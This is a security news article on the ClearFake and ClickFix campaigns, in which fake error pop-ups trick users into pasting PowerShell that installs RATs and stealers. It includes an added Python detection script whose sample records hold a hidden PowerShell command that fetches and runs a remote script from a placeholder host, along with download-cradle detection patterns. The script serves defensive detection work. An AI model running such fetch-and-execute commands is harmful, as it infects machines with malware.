Cut & Paste Tactics Import Malware to Unwitting Victims

Published: 23/11/2024   Category: security


ClearFake and ClickFix attackers are tricking people into cutting and pasting malicious PowerShell scripts to infect their own machines with RATs and infostealers.



Threat actors are using fake browser updates and software fixes to trick users into copying and pasting PowerShell scripts loaded with various malware strains, including remote access Trojans (RATs) and infostealers, to infect their own computers.
Researchers from Proofpoint observed the socially engineered technique employed by an initial access broker tracked as TA571, as well as by an unidentified actor, over the last three months, starting as early as March 1, they revealed in a blog post published June 17.
There appear to be two methods of social engineering used in the activity: one that offers fake browser updates in yet another ClearFake campaign, and another that delivers error messages related to Word, Google Chrome, and OneDrive, dubbed ClickFix by the researchers. Malware delivered in the campaign includes the DarkGate and NetSupport RATs, the malware loader Matanbuchus, and various information stealers, including Lumma and Vidar.
Whether the initial campaign begins via malspam or is delivered via web browser injects, the technique is similar, Proofpoint researchers Tommy Madjar, Dusty Miller, Selena Larson, and the Proofpoint Threat Research Team explained in the post.
The campaigns show users a pop-up text box suggesting that an error occurred when trying to open the document or webpage, followed by instructions to copy and paste a malicious script into either the PowerShell terminal or the Windows Run dialog box, so that the script is eventually executed via PowerShell, they said.
Attackers use clever and authoritative social engineering in the fake error messages delivered to users in the campaign, and also provide both the problem and a solution, so that a viewer may take prompt action without pausing to consider the risk, the researchers noted.
The activity reflects a trend among cybercriminals toward increasingly creative attack chains, built to ensure the success of campaigns that employ nested PowerShell and other technical tactics that users do not easily detect, they said.
Proofpoint first observed the cut-and-paste technique in a ClearFake campaign in early April, and in every ClearFake campaign since then, the researchers noted. ClearFake is a previously identified fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
In the latest campaigns, when a user visited a compromised website, the injection caused the site to load a malicious script hosted on the blockchain via Binance's Smart Chain contracts, using a technique known as EtherHiding. The initial script then loaded a second script from a domain, which eventually presented a fake warning instructing the user to install a root certificate in order to view the website correctly.
The message included instructions to click a button to copy a PowerShell script, then provided steps on how to manually run this script on the victim's computer. If the user follows them, the script is executed when it is pasted into the PowerShell command-line window. Proofpoint observed at least five types of malware being delivered in this way, including the Lumma stealer, Amadey Loader, and JaskaGo.
Proofpoint first began to observe what it calls the ClickFix campaign in mid-April, when its researchers found compromised sites containing an inject leading to an iframe on pley[.]es, displayed as an overlay error message. The message claimed that a faulty browser update needed to be fixed and asked the victim to open "Windows PowerShell (Admin)", which triggers a User Account Control (UAC) prompt, and then right-click to paste the code.
If users take the bait, PowerShell runs another remote PowerShell script that downloads and runs an executable, eventually leading to the Vidar stealer. While the payload domain used in the PowerShell was taken offline just a few days after the researchers discovered the activity, the custom content of the iframe was replaced with the ClearFake injection, which was still active earlier this month. The researchers remain unsure whether the same actor is behind ClearFake and ClickFix, however.
Proofpoint observed TA571 using cut-and-paste PowerShell against victims as early as March 1, in a campaign that included more than 100,000 messages and targeted thousands of organizations globally. The threat actor employed emails containing an HTML attachment that displayed a page resembling Microsoft Word, as well as an error message claiming that the Word Online extension is not installed.
The message presented users with two options to continue, either "how to fix" or "auto-fix", both of which led them down malicious paths to install malware, including Matanbuchus or DarkGate, using PowerShell or DLL files.
TA571's use of similar attack chains throughout the spring, using various visual lures and alternating between instructing the victim to open the PowerShell terminal or to use the Run dialog box, demonstrates a link between the actor and the ClickFix campaign, the researchers noted.
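As an added illustration, not part of the Proofpoint post or of this article, the chain described above leaves a distinctive process-creation trail that a detection team can key on: when the Run dialog is used, explorer.exe starts a PowerShell process with a hidden window and a download cradle on its command line; when the script is pasted into an already-open console, powershell.exe spawns a second, often encoded, powershell.exe. The Python below runs a few such rules over constructed Sysmon-style process records. The record fields, rule names, domains and sample command lines are assumptions made for the example, not values from the page.

```python
import re

# Constructed Sysmon Event ID 1 style records (parent image, image, command line).
# These are made-up samples for the example, not real telemetry from the campaign.
SAMPLE_EVENTS = [
    # 0: user opened a console normally; no arguments, nothing to flag.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    # 1: Run-dialog paste: explorer.exe launches a hidden PowerShell that fetches
    #    and runs a remote script (hypothetical domain).
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://fix.example.invalid/update.ps1 -UseBasicParsing)"'},
    # 2: nested PowerShell: a script pasted into an open console spawns a second,
    #    encoded powershell.exe (payload is a placeholder, decodes to "ABCD").
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -EncodedCommand QUJDRA=="},
    # 3: service-driven maintenance script; non-interactive but not suspicious here.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NonInteractive -File C:\Scripts\cleanup.ps1"},
]

PS_IMAGE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)

# Command-line rules, in the order their names are reported.
# PowerShell accepts unambiguous prefixes of its switches, so "-w h" and
# "-enc" are matched as well as the long forms.
RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b"
        r"|\b(?:iwr|invoke-webrequest|downloadstring|downloadfile)\b.*\b(?:iex|invoke-expression)\b",
        re.I)),
]


def analyze(event):
    """Return the list of reasons an event looks like a pasted-script launch.

    An empty list means the event is not a PowerShell start or matched nothing.
    Parent-process context is appended as its own reason so the analyst can
    weigh "came from explorer.exe" (Run dialog) separately from "nested".
    """
    reasons = []
    if not PS_IMAGE.search(event["image"]):
        return reasons
    for name, pattern in RULES:
        if pattern.search(event["cmdline"]):
            reasons.append(name)
    # powershell.exe spawning powershell.exe is the "nested PowerShell" pattern.
    if PS_IMAGE.search(event["parent"]):
        reasons.append("nested_powershell")
    # Only add the explorer.exe context when something else already fired;
    # simply opening a console from the shell is not an alert by itself.
    if reasons and EXPLORER.search(event["parent"]):
        reasons.append("launched_from_explorer")
    return reasons


def triage(events):
    """Map event index -> reasons for every event that triggered at least one rule."""
    results = {}
    for idx, event in enumerate(events):
        reasons = analyze(event)
        if reasons:
            results[idx] = reasons
    return results


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(reasons)}")
        print(f"    {SAMPLE_EVENTS[idx]['cmdline']}")
```

The hidden-window and encoded-command rules alone will also fire on some legitimate administrative tooling, which is why the parent-process context is reported as a separate reason rather than folded into a single score; a team can then require, say, `launched_from_explorer` or `nested_powershell` together with one command-line match before paging anyone. On a host under investigation for the Run-dialog variant, the dialog's history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` is a quick corroborating check for what the user actually pasted.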
Proofpoint included a list of indicators of compromise (IoCs) in recent campaigns, acknowledging that it is not an exhaustive list but merely a snapshot of websites, email addresses, and other processes related to the malicious activity that its researchers have observed.
Overall, the attack chain requires significant user interaction to be successful, which means the most practical way for organizations to help avoid compromise on their networks is employee awareness and training, the researchers noted.
Organizations should train users to identify the activity and report suspicious activity to their security teams, the researchers wrote. This is very specific training but can easily be integrated into an existing user training program. 
